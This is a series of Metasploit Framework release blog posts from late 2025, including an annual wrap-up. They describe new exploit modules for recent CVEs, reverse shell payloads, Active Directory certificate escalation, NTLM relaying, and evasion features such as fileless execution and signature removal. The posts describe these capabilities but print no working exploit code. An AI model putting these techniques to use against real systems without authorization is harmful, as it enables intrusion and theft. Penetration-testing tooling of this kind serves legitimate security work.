#20370 from msutovsky-r7 - Fixes an issue that occurred when negotiating the SMB version and the server uses an unknown dialect. Now, the login function will throw an exception and exit gracefully.
#20744 from ptrstr - This fixes a bug in unix/webapp/wp_reflexgallery_file_upload where the current year and month were being hardcoded in the request. This caused the server to reject the exploit if there was no folder in wp-content/uploads for that specific year and month. Now the year and month are configurable datastore options.

Documentation added (1)

#20831 from DataExplorerX - This adds link to issues in Metasploit Framework Github repository.

You can always find more documentation on our docsite at docs.metasploit.com.

Get it

As always, you can update to the latest Metasploit Framework with msfupdate and you can get more details on the changes since the last blog post from GitHub:

Metasploit 2025 Annual Wrap-Up

Spencer McIntyre — Mon, 05 Jan 2026 20:31:31 GMT

Hard to believe it's that time again, and that Metasploit Framework will see the dawn of another Annual Wrap-Up (and a New Year). All of the metrics and modules you see here would in large part not be possible without the dedicated community members who care about the Framework and its mission on all the days of the year. It is their hard work and dedication that makes it look like magic, and sometimes, it feels like it too. A heartfelt thank you to all of our researchers and contributors, you're what makes Metasploit Framework so resilient.

This year brought its share of notable vulnerabilities, substantial framework improvements, and continued evolution of the project. Whether you submitted a module, filed an issue, or helped triage a bug, your contributions have kept Metasploit relevant and powerful. So without further ado, let's dive into the highlights from 2025.

Persistence Overhaul

One of the year's significant infrastructure improvements came from community contributor h00die, who spearheaded a massive refactor of Metasploit's persistence modules. The project, tracked in issue #20374, involved reorganizing dozens of persistence modules from their scattered locations across the framework into a dedicated persistence directory under exploits. This wasn't just housekeeping—h00die created a standardized persistence mixin that brought consistency to how modules handle installation, cleanup, and option handling. The refactor touched over 30 modules spanning Linux, Windows, OSX, and multi-platform techniques, modernizing each one with proper check methods, MITRE ATT&CK references, and standardized options like WritableDir. The work also laid the groundwork for a persistence suggester module that can automatically recommend viable persistence techniques based on session characteristics.

The sheer scope of this effort can't be overstated. Breaking the work into manageable chunks, h00die systematically converted modules from the old post-exploitation style to proper exploit modules with the new persistence mixin, handling everything from cron jobs and SSH keys to Windows registry modifications and service installations. The standardization means that all persistence modules now share common behaviors, produce cleanup scripts in a consistent format, and integrate cleanly with the rest of the framework. It's the kind of unglamorous but essential work that improves the entire framework's usability and maintainability, and we're grateful to h00die for taking on such an ambitious project and seeing it through.

AD CS Vulnerable Certificate Template Detection and Exploitation Additions

This year, Metasploit expanded its Active Directory Certificate Services (AD CS) coverage by adding detection and exploitation support for certificate templates vulnerable to ESC9, ESC10, and ESC16. Checks for these misconfigured certificate templates were integrated into the existing ldap_esc_vulnerable_template module, allowing users to easily identify misconfigured templates during assessments.

To complement this detection capability, we introduced the new esc_update_ldap_object module, which enables reliable exploitation of these vulnerable templates to escalate privileges. ESC9, ESC10, and ESC16 share a common pattern: each requires control of a user account with write privileges over another user that is permitted to enroll in the vulnerable template. While exploiting these techniques with other tools typically involves multiple manual and error-prone steps, the new module streamlines the entire workflow. Users configure the required datastore options, run the module, and receive a certificate that can be used to escalate privileges within the domain.

As part of this effort, we also introduced the ldap_object_attribute module, which provides standard CRUD operations for manipulating LDAP objects in Active Directory. This module — along with existing functionality such as shadow_credentials and get_ticket — is used internally by esc_update_ldap_object to abstract away low-level LDAP interactions and simplify exploitation.

This work included comprehensive documentation covering the configuration of templates vulnerable to ESC9, ESC10, and ESC16, as well as detailed instructions for exploiting each technique using the new module.

Active Directory Improvements

Related to our AD CS improvements, came new low-level functionality for interacting with Active Directory (AD) Domain Controllers over LDAP. Over the past couple of years, Metasploit has seen multiple modules added that facilitate AD attack workflows including Shadow Credentials, RBCD, Unconstrained Delegation, etc. Like the AD CS attacks, many of these techniques are reliant on access control to some degree. Over the summer, Metasploit introduced new functionality to facilitate checking for these types of attacks. This new library provides Active Directory specific functionality, most notably, the ability to remotely evaluate security descriptors to determine whether a particular user or group has a specific access right. This has already been incorporated into the following modules to either enable or improve the existing detection capabilities.

auxiliary/admin/ldap/shadow_credentials
auxiliary/admin/ldap/rbcd
auxiliary/admin/ldap/ad_cs_cert_template
auxiliary/gather/ldap_esc_vulnerable_cert_finder

For module authors, the library provides a composable API for determining if an object grants a particular permission to an optional SID. The SID can be either a user or group, and when omitted is automatically set to the authenticating user, i.e. to check if the current connection has the permissions.

For example, check if the object grants the read and write property permissions with:

adds_obj_grants_permissions?(@ldap, obj, SecurityDescriptorMatcher::Allow.all(%i[RP WP]))

Code Cleanup At Scale

Beyond new features and modules, 2025 also saw substantial code quality improvements thanks to community contributor bcoles, who took on the often-thankless task of resolving RuboCop violations across the codebase. Throughout the year, bcoles systematically worked through older modules, cleaning up style inconsistencies, fixing syntax violations, and converting outdated property types to proper boolean values in auxiliary scanners and exploit modules. This kind of incremental maintenance work—fixing redundant parentheses here, resolving style violations there—doesn't make for flashy headlines, but it keeps the codebase maintainable and makes life easier for everyone working in the framework. Code quality matters, and we're grateful to bcoles for putting in the work to keep Metasploit's technical debt in check.

Payload Improvements

It may be a fun fact, or perhaps tribal knowledge that an “exploit” to Metasploit is a module that delivers a payload. All the great exploit content this year would be nothing without corresponding payloads to deliver and we make sure that those get plenty of our time as well. The following changes in particular are highly impactful and may have gone unnoticed while the flashier exploits received all the attention.

Windows Meterpreter Improvements

The biggest updates for the Windows Meterpreter revolve around two major improvements: the first is the upgrade to ReflectiveDLLInjection, made by Alex (xaitax) Hagenah, for which we express our gratitude for improving this area of the Metasploit Framework that requires a high level of attention to detail. This update introduces full, production-ready ARM64 support and a comprehensive architectural modernization of the whole library. These changes open the door to future support for a native ARM64 Meterpreter on Windows. Additionally, Metasploit split the standard API extension for Windows this year. This was actually the design used in the original Meterpreter implementation and we’ve reconsidered the monolithic approach. This improvement is one of the multiple steps we have in the pipeline to improve the evasion capabilities for our Windows Meterpreter. The standard API library now allows the user to load only specific subcomponents of the extension (for example, the component for network or file-system interaction), reducing the memory footprint for memory scanners. To leverage this new functionality, set AutoLoadStdapi to False, and then load one or more extensions manually, e.g. load stdapi_fs. To maintain backwards compatibility, a single stdapi extension is also still available and can be loaded with load stdapi.

Fetch Payload Improvements

The first milestone was the introduction of fileless execution for Linux fetch payloads, enabling payloads to run directly from memory using anonymous files. This advancement greatly enhances operational stealth by minimizing forensic traces and avoiding file-based detection, with careful attention to safe, opt-in behavior and collaborative code refinement. Following this, the FETCH_PIPE option streamlined payload deployment into a single, compact command. This improvement enhanced both usability and evasion, while also supporting larger, more complex command payloads (such as fileless execution) to be executed even with reduced command size. Additionally, fetch payload support has expanded to seven additional CPU architectures: aarch64, armbe, armle, mipsbe, mipsle, ppc, and ppc64le. This significantly broadens Metasploit's reach across embedded and legacy systems. Both features are thoroughly tested and future-proof, making the framework more versatile and powerful.

New Architectures Basic Support

This year, we have also updated the framework to support new basic payloads. We have introduced the exec payload for Windows ARM64 (provided by Alex (xaitax) Hagenah), reverse shell for RISC-V 32 and 64 bit, and Loongarch64 (both provided by bcoles).

COMING SOON

As much as we try, everything doesn’t always fit into one year. With that in mind, we wanted to highlight some upcoming features that we’re particularly excited to complete in the coming months.

Malleable C2

The malleable c2 will allow the user to specify with a .profile scribing how the HTTP requests between meterpreter and metasploit-framework should look like, allowing metasploit to hide the distinctive traffic generated by the session communication.

Direct Syscall in Metsrv

We have updated the Meterpreter core (metsrv) to remove common static signatures, such as specific strings and function imports, making it harder to detect.

PoolParty for 32-bit systems

Additional work to port the poolparty injection on native 32 bit system, Huge thanks to xHector1337 for taking over the research and extension of the code injection for the new architecture.

SCCM Modules

This year, Metasploit added two modules for targeting SCCM instances and recovering the Network Access Account credentials. These modules differ in how they perform the authentication. The first, auxiliary/admin/sccm/get_naa_credentials accepts credentials from the operator and will use them to authenticate and run the attack on demand. This pairs nicely with the auxiliary/admin/dcerpc/samr_account module when the operator can create a new machine account. However, when that’s not an option, Metasploit still has you covered with the auxiliary/server/relay/relay_get_naa_credentials variant that enables relaying NTLM authentication from an SMB server. These attack workflows were demonstrated at Black Hat and DEF CON over the summer and we anticipate they’ll remain useful in the future.

Module Highlights

CVE-2025-9316, CVE-2025-11700 N-able N-Central XXE – N-able N-Central is a popular Remote Monitoring and Management (RMM) platform. These two vulnerabilities, when combined, enable Metasploit to read local files without authenticating. This can be used to obtain a number of sensitive backup files from the application itself, or anything else on the host system. XXE attacks are a less common vulnerability, at least in Metasploit-land but this is a fantastic example of how impactful they can be.
CVE-2025-22457 Ivanti Connect Secure Unauthenticated RCE – Ivanti RCEs are always valuable and this module shows that memory corruption lives on in 2025. Not only is this exploit unauthenticated and reliable, it is a great example of how ROP chains can be used.
CVE-2024-55555 Invoice Ninja RCE – This particular module leverages a PHP deserialization vulnerability within the application. While this vulnerability requires knowledge of the APP_KEY, successful exploitation could have significant financial implications. As an added bonus, this module came with a new library adding support for Laravel Framework-specific cryptography methods.
CVE-2024-55556 InvoiceShelf RCE – Everyone loves a good pairing, and this module continues h00die-gr3y’s work on invoicing software, showing that they’re useful for receiving more than just payments.
LDAP Password Disclosure – This module has been around for a while, but received some new features in 2025 for targeting Active Directory Domain Controllers. The first added support for LAPSv1 and v2, enabling the module to recover the local admin account on systems. Later in the year, a second improvement added support for gMSA accounts. This module also pairs nicely with the new SMB to LDAP NTLM Relay module we added this year as well.
Microsoft SharePoint ToolPane Unauthenticated RCE (CVE-2025-53770 and CVE-2025-53771)
Exploit module for CVE-2025-32433 (Erlang/OTP)

SMB Relay Expansion

This year, Metasploit significantly leveled up its relaying capabilities, transforming the framework’s only SMB to SMB relay capability into a powerful engine for lateral movement. Traditionally, SMB relaying was often the domain of standalone external tools, but through the dedicated work of the Metasploit team, these workflows are now seamlessly integrated into the framework

Community Stats Recap

A huge thank you from the entire Metasploit team to all 66 contributors in 2025. Your contributions and ideas are what continue to improve this tool every year. Notably, 41 of these were first-time contributors who added new code.

Here are some stats for 2025:

Number of new modules: 139
Number of new bug fixes: 133
Number of new enhancements: 115
Number of new documentations: 19
Number of new payload enhancements: 18

Contributors in 2025 (ordered by count)

bcoles
h00die
Chocapikk
h00die-gr3y
Takahiro-Yoko
h4x-x0r
smashery
vognik (new in 2025)
jvoisin
xHector1337 (new in 2025)
jmartin-tech
mariomontecatine (new in 2025)
blue0x1 (new in 2025)
nakkouchtarek (new in 2025)
molecula2788
xaitax
happybear-21 (new in 2025)
e2002e
fabpiaf (new in 2025)
mekhalleh
JohannesLks (new in 2025)
BitTheByte (new in 2025)
todb
00nx (new in 2025)
DevBuiHieu (new in 2025)
SweilemCodes (new in 2025)
arpitjain099 (new in 2025)
L-codes
Zeecka (new in 2025)
aaryan-11-x
whotwagner
lafried (new in 2025)
sebaspf (new in 2025)
hantwister (new in 2025)
tastyrce (new in 2025)
easymoney322 (new in 2025)
gardnerapp
TheBigStonk (new in 2025)
0xAryan (new in 2025)
sempervictus
szymonj99
Mathiou04
vultza (new in 2025)
enty8080 (new in 2025)
SaiSakthidar (new in 2025)
Zedeldi (new in 2025)
stfnw (new in 2025)
mmacfadden (new in 2025)
daffainfo (new in 2025)
HamzaSahin61 (new in 2025)
survivant (new in 2025)
uhei
EchoSl0w (new in 2025)
jeffmcjunkin
BenoitDePaoli (new in 2025)
randomstr1ng
2tunnels (new in 2025)
rodolphopivetta (new in 2025)
RakRakGaming (new in 2025)
Desiree05 (new in 2025)
Wopseeion (new in 2025)
jphamgithub (new in 2025)
H4k1l (new in 2025)
fishBone000 (new in 2025)
xl4635 (new in 2025)

Metasploit Wrap-Up 12/19/2025

Spencer McIntyre — Fri, 19 Dec 2025 21:02:00 GMT

React2Shell Payload Improvements

Last week Metasploit released an exploit for the React2Shell vulnerability, and this week we have made a couple of improvements to the payloads that it uses. The first improvement affects all Metasploit modules. When an exploit is used, an initial payload is selected using some basic logic that effectively would make a selection from the first available in alphabetical order. Now Metasploit will prefer a default of x86 Meterpreters for Windows systems (since 32-bit payloads work on both 32-bit and 64-bit versions of Windows) and x64 Meterpreters for all other platforms including Linux. In the context of React2Shell, this means the payload now defaults to x64 for Linux instead of AARCH64.

Another improvement that only affects this exploit was the change of the default payload to one leveraging Node.js which is more likely to be present than the wget binary that was required. These defaults should hopefully help users get started with this high-impact exploit with more ease, but of course any compatible payload can still be selected.

Stay tuned for the Metasploit annual wrap-up and roadmap announcement coming up!

New module content (2)

N-able N-Central Authentication Bypass and XXE Scanner

Authors: Valentin Lobstein chocapikk@leakix.net and Zach Hanley (Horizon3.ai)

Type: Auxiliary

Pull request: #20713 contributed by Chocapikk

Path: scanner/http/nable_ncentral_auth_bypass_xxe

AttackerKB reference: CVE-2025-11700

Description: This adds an auxiliary module that exploits two CVEs affecting N-able N-Central. CVE-2025-9316, an Unauthenticated Session Bypass and CVE-2025-11700 a XXE (XML External Entity) vulnerability. The module combines both vulnerabilities to achieve unauthenticated file read on affected N-Central instances (versions < 2025.4.0.9).

Grav CMS Twig SSTI Authenticated Sandbox Bypass RCE

Author: Tarek Nakkouch

Type: Exploit

Pull request: #20749 contributed by nakkouchtarek

Path: multi/http/grav_twig_ssti_sandbox_bypass_rce

AttackerKB reference: CVE-2025-66301

Description: This adds an exploit module for a Server-Side Template Injection (SSTI) vulnerability (CVE-2025-66294) in Grav CMS, versions prior to 1.8.0-beta.27 , that allows bypassing the Twig sandbox to achieve remote code execution. To inject the malicious payload into a form's process section, this module leverages CVE-2025-66301, a broken access control flaw in the /admin/pages/{page_name} endpoint.

Enhancements and features (2)

#20424 from cdelafuente-r7 - Updates how vulnerabilities and services are reported by adding a resource field to both models. It also add a parents field to make layered services possible. An optional resource field can now be provided and the existing service field has been updated to also accept an option hash.
#20771 from zeroSteiner - Updates Metasploit's default payload selection logic to preference x86 payloads over AARCH64 payloads.
#20773 from jheysel-r7 - This updates the exploit for React2Shell with a better default payload.

Documentation

You can find the latest Metasploit documentation on our docsite at docs.metasploit.com.

Get it

As always, you can update to the latest Metasploit Framework with msfupdate and you can get more details on the changes since the last blog post from GitHub:

Metasploit Wrap-Up 12/12/2025

Spencer McIntyre — Fri, 12 Dec 2025 20:38:50 GMT

React2shell Module

As you may have heard, on December 3, 2025, the React team announced a critical Remote Code Execution (RCE) vulnerability in servers using the React Server Components (RSC) Flight protocol. The vulnerability, tracked as CVE-2025-55182, carries a CVSS score of 10.0 and is informally known as "React2Shell". It allows attackers to achieve prototype pollution during deserialization of RSC payloads by sending specially crafted multipart requests with "proto", "constructor", or "prototype" as module names. We're happy to announce that community contributor vognik submitted an exploit module for React2Shell which landed earlier this week and is included in this week's release.

MSSQL Improvements

Over the past couple of weeks Metasploit has made a couple of key improvements to the framework’s MSSQL attack capabilities. The first (PR 20637) is a new NTLM relay module, auxiliary/server/relay/smb_to_mssql, which enables users to start a malicious SMB server that will relay authentication attempts to one or more target MSSQL servers. When successful, the Metasploit operator will have an interactive session to the MSSQL server that can be used to run interactive queries, or MSSQL auxiliary modules.

Building on this work, it became clear that users would need to interact with MSSQL servers that required encryption as many do in hardened environments. To achieve that objective, issue 18745 was closed by updating Metasploits MSSQL protocol library to offer better encryption support. Now, Metasploit users can open interactive sessions to servers that offer and even require encrypted connections. This functionality is available automatically in the auxiliary/scanner/mssql/mssql_login and new auxiliary/server/relay/smb_to_mssql modules.

New module content (5)

Magento SessionReaper

Authors: Blaklis, Tomais Williamson, and Valentin Lobstein chocapikk@leakix.net

Type: Exploit

Pull request: #20725 contributed by Chocapikk

Path:multi/http/magento_sessionreaper

AttackerKB reference: CVE-2025-54236

Description: This adds a new exploit module for CVE-2025-54236 (SessionReaper), a critical vulnerability in Magento/Adobe Commerce that allows unauthenticated remote code execution. The vulnerability stems from improper handling of nested deserialization in the payment method context, combined with an unauthenticated file upload endpoint.

Unauthenticated RCE in React and Next.js

Authors: Lachlan Davidson, Maksim Rogov, and maple3142

Type: Exploit

Pull request: #20760 contributed by sfewer-r7

Path: multi/http/react2shell_unauth_rce_cve_2025_55182

AttackerKB reference: CVE-2025-66478

Description: This adds an exploit for CVE-2025-55182 which is an unauthenticated RCE in React. This vulnerability has been referred to as React2Shell.

WordPress King Addons for Elementor Unauthenticated Privilege Escalation to RCE

Authors: Peter Thaleikis and Valentin Lobstein chocapikk@leakix.net

Type: Exploit

Pull request: #20746 contributed by Chocapikk

Path: multi/http/wp_king_addons_privilege_escalation

AttackerKB reference: CVE-2025-8489

Description: This adds an exploit module for CVE-2025-8489, an unauthenticated privilege escalation vulnerability in the WordPress King Addons for Elementor plugin (versions 24.12.92 to 51.1.14). The vulnerability allows unauthenticated attackers to create administrator accounts by specifying the user_role parameter during registration, enabling remote code execution through plugin upload.

Linux Reboot

Author: bcoles bcoles@gmail.com

Type: Payload (Single)

Pull request: #20682 contributed by bcoles

Path:linux/loongarch64/reboot

Description: This extends our payloads support to a new architecture, LoongArch64. The first payload introduced for this new architecture is the reboot payload, which will cause the target system to restart once triggered.

Enhanced Modules (2)

Modules which have either been enhanced, or renamed:

#20736 from sfewer-r7 - This pull requests updates the exploit/linux/http/fortinet_fortiweb_rce module (added in https://github.com/rapid7/metasploit-framework/pull/20717) to add in support for older version of FortiWeb, versions 6.*, which are no longer under support from the vendor.
#20747 from vognik - This adds an exploit for CVE-2025-55182 which is an unauthenticated RCE in React. This vulnerability has been referred to as React2Shell.

Enhancements and features (1)

#20704 from dwelch-r7 - The module auxiliary/scanner/ssh/ssh_login_pubkey has been removed. Its functionality has been moved into auxiliary/scanner/ssh/ssh_login.

Documentation

You can find the latest Metasploit documentation on our docsite at docs.metasploit.com.

Get it

As always, you can update to the latest Metasploit Framework with msfupdate and you can get more details on the changes since the last blog post from GitHub:

Metasploit Wrap-Up 12/05/2025

Jack Heysel — Fri, 05 Dec 2025 20:58:04 GMT

Twonky Auth Bypass, RCEs and RISC-V Reverse Shell Payloads

This was another fantastic week in terms of PR contribution to the Metasploit Framework. Rapid7’s very own Ryan Emmons recently disclosed CVE-2025-13315 and CVE-2025-13316 which exist in Twonky Server and allow decrypting admin credentials by reading logs without authentication (which contain them). The auxiliary module Ryan submitted which exploits both of these CVEs was released this week. Community contributor Valentin Lobsein aka Chocapikk has returned to the PR queue with a welcomed vengeance. Two modules from Chocapikk were landed this week, a Monsta FTP downloadFile Remote Code Execution module along with a WordPress AI Engine Plugin MCP Unauthenticated Admin Creation to RCE. In addition to some awesome module content, community contributor bcoles added Linux RISC-V 32-bit/64-bit TCP reverse shell payloads.

New module content (5)

Twonky Server Log Leak Authentication Bypass

Author: remmons-r7

Type: Auxiliary

Pull request: #20709 contributed by remmons-r7

Path: gather/twonky_authbypass_logleak

AttackerKB reference: CVE-2025-13316

Description: This module exploits two CVEs: CVE-2025-13315 and CVE-2025-13316. Both CVEs exist in Twonky Server and allow decrypting admin credentials by reading logs without authentication (which contain them). Then, because the module uses hardcoded keys, it decrypts those credentials.

Monsta FTP downloadFile Remote Code Execution

Authors: Valentin Lobstein chocapikk@leakix.net, msutovsky-r7, and watchTowr Labs

Type: Exploit

Pull request: #20718 contributed by Chocapikk

Path: multi/http/monsta_ftp_downloadfile_rce

AttackerKB reference: CVE-2025-34299

Description: This add module for CVE-2025-34299. The module exploits a vulnerability in the downloadFile action which allows an attacker to connect to a malicious FTP server and download arbitrary files to arbitrary locations on the Monsta FTP server.

WordPress AI Engine Plugin MCP Unauthenticated Admin Creation to RCE

Authors: Emiliano Versini, Khaled Alenazi (Nxploited), Valentin Lobstein chocapikk@leakix.net, and dledda-r7

Type: Exploit

Pull request: #20720 contributed by Chocapikk

Path: multi/http/wp_ai_engine_mcp_rce

AttackerKB reference: CVE-2025-11749

Description: This adds a new exploit module for an unauthenticated vulnerability in the WordPress AI Engine plugin, which has over 100,000 active installations. The vulnerability allows an attacker to create an administrator account via the MCP (Model Context Protocol) endpoint without authentication, then upload and execute a malicious plugin to achieve remote code execution. The vulnerability is being tracked as CVE-2025-11749.

Linux Command Shell, Reverse TCP Inline

Authors: bcoles bcoles@gmail.com and modexp

Type: Payload (Single)

Pull request: #20712 contributed by bcoles

Path: linux/riscv32le/shell_reverse_tcp

Description: This adds Linux RISC-V 32-bit/64-bit TCP reverse shell payloads.

Linux Command Shell, Reverse TCP Inline

Authors: bcoles bcoles@gmail.com and modexp

Type: Payload (Single)

Pull request: #20712 contributed by bcoles

Path: linux/riscv64le/shell_reverse_tcp

Description: This adds Linux RISC-V 32-bit/64-bit TCP reverse shell payloads.

Enhancements and features (3)

#20658 from jheysel-r7 - This adds a number of accuracy enhancements to the ldap_esc_vulnerable_cert_finder module. It also adds a CertificateAuthorityRhost datastore option to the esc_update_ldap_object module so the operator can specify an IP Address explicitly in cases where the hostname cannot be resolved via DNS.
#20677 from zeroSteiner - This enables sessions to MSSQL servers that require encryption. These changes add a new MsTds::Channel which leverages Rex's socket abstraction to facilitate the necessary encapsulation for the TLS negotiation.
#20741 from SaiSakthidar - This removes CAIN as an output format for collected hashes.

Documentation

You can find the latest Metasploit documentation on our docsite at docs.metasploit.com.

Get it

As always, you can update to the latest Metasploit Framework with msfupdate and you can get more details on the changes since the last blog post from GitHub: